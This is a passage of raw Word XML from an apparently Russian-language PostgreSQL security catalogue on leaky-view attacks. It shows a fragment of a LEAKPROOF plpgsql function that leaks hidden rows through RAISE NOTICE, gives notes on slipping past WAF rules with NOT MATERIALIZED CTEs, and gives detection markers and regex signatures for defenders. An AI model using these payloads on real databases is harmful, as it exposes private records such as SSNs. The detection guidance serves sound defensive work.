          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если view создана с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(защита включена), planner блокирует push-down любой функции, не помеченной как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакующий может создать функцию с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-флагом — но это требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (документировано в PG 9.2+: только superuser может создать LEAKPROOF-функцию, чтобы избежать тривиального обхода).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если у атакующего есть SUPERUSER (через 3.13):</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fake_leakproof(t text, guess text) RETURNS boolean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plpgsql LEAKPROOF COST 0.0001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IF t LIKE guess || '%' THEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RAISE NOTICE 'leak: %', t;  -- через NOTICE-канал, без exception</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RETURN false;</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LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> декларирует «функция не leak-ит», что планировщик принимает на веру. С этим флагом push-down разрешён даже через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Внутри функция всё равно leak-ит — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RAISE NOTICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (notice идёт клиенту через async-канал, виден приложением).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это критическая комбинация: SUPERUSER + 3.10.3 → обход даже корректно настроенного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Поэтому 3.13 (privilege escalation) — пререквизит для этого payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий получает прямой доступ к строкам, которые view скрывает через WHERE-фильтр. Бинарный/итеративный поиск по leaky-функции восстанавливает значения сoлумни-за-колумной из чужих rows. Если view скрывает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ssn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internal_notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все эти данные leak-аются.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">С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(Payload C) — то же, но требует SUPERUSER для создания LEAKPROOF-функции, что нивелирует ACL-view как защитный механизм против atomic-уровня compromised user.</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security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">дефолт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Большинство DBA не знают про этот флаг или не включают (он замедляет планировщик); leaky-views — open default.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WAF не блокирует CREATE FUNCTION — это не строка в blacklist (DDL обычно в payload не появляется на read-path; атакующий создаёт функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">один раз</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через отдельный inject в admin-эндпоинт или через 3.13 → 3.7).</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 AS NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартный SQL keyword (PG 12+). WAF-сигнатура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bWITH\b.*\bNOT\s+MATERIALIZED\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> редко в правилах.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Inline CTE — дефолт PG 12+; в большинстве кодовых баз CTE-обёртки писались без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (потому что в PG ≤ 11 это было лишнее) → массово unsafe.</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`security_barrier`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: VIEW-опция, документация https://www.postgresql.org/docs/current/rules-privileges.html#RULES-PRIVILEGES. С PG 9.2.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Pushdown rules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PG-планировщик пушит quals (predicates) через view-границы, если функция не помечена </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEAKPROOF=false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> явно (либо view не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Это поведение задокументировано как «leaky views problem».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`LEAKPROOF`-flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: documentation — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION ... LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Только SUPERUSER может создать. Требование введено в PG 9.2; до этого leaky-функции были unrestricted, что делало ACL-views полностью бесполезными.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CTE inlining</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: с PG 12, документация https://www.postgresql.org/docs/12/queries-with.html#QUERIES-WITH-CTE-MATERIALIZATION. Поведение: CTE c одиночной ссылкой → inline; со множественными → materialize.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Explicit `MATERIALIZED` / `NOT MATERIALIZED`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PG 12+ keyword, override-механизм для планировщика.</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12+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для CTE inlining default и для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MATERIALIZED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NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> keywords.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9.2+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">security_barrier</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LEAKPROOF</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Payload A/B: SELECT на view + CREATE FUNCTION на своей user-schema (или public до PG 15).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Payload C: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для создания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> функции; без SUPERUSER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view надёжно блокирует push-down.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View с `security_barrier=off`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дефолт) — необходимое условие для Payload A/B.</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 self-hosted. CTE/view-фичи стабильны и одинаковы на всех провайдерах. На managed-PG атрибут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">security_barrier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> устанавливается DBA через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER VIEW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; провайдеры его не контролируют.</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Materialization control в reports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counts AS MATERIALIZED (SELECT ...) SELECT * FROM counts CROSS JOIN big_table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — материализация дешёвой stage перед join с большой таблицей.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CTE для аналитики над view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summary AS (SELECT customer_id, sum(total) FROM orders_visible GROUP BY customer_id) SELECT * FROM summary WHERE customer_id IN (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обычный pattern.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LEAKPROOF-функции в production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: некоторые core PG функции помечены как LEAKPROOF — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">int4eq</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texteq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и т.д. Они безопасны, потому что не имеют side-effects и не raise exceptions с user-data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Маркеры атаки vs легитимного использования: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`leak`/`leaky` в имени функции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — очевидный сигнал в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_proc.proname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Однако реальные атакующие назовут функцию нейтрально (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pred1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validate_str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`COST 0.0001`</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pg_proc.procost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функция с экстремально низкой cost-меткой. Legitimate функции редко переопределяют дефолт; cost=0.0001 — индикатор атаки на pushdown.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`prosecdef=true` + `LEAKPROOF=true` + owner != superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — invariant violation. С PG 9.2+ только superuser может создать LEAKPROOF-функцию; если функция с этим флагом owned не superuser-ом — что-то нарушено (post-exploitation evidence).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`RAISE NOTICE`/`RAISE EXCEPTION`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с user-data внутри predicate-функции — leak-канал. Сигнатура в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prosrc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RAISE\s+(NOTICE|EXCEPTION)\s+'[^']*%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> рядом с column-references.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`WITH ... AS NOT MATERIALIZED`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в runtime-генерируемом SQL — почти всегда атака. Легитимное использование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> редко в application-коде (там CTE-обёртки просто без keyword); явное </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — explicit performance-hint, обычно в reporting/ETL ad-hoc-запросах.</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12 – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — главный таргет 3.10.3 (CTE inlining дефолт, leaky-views unchanged).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9.2 – 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
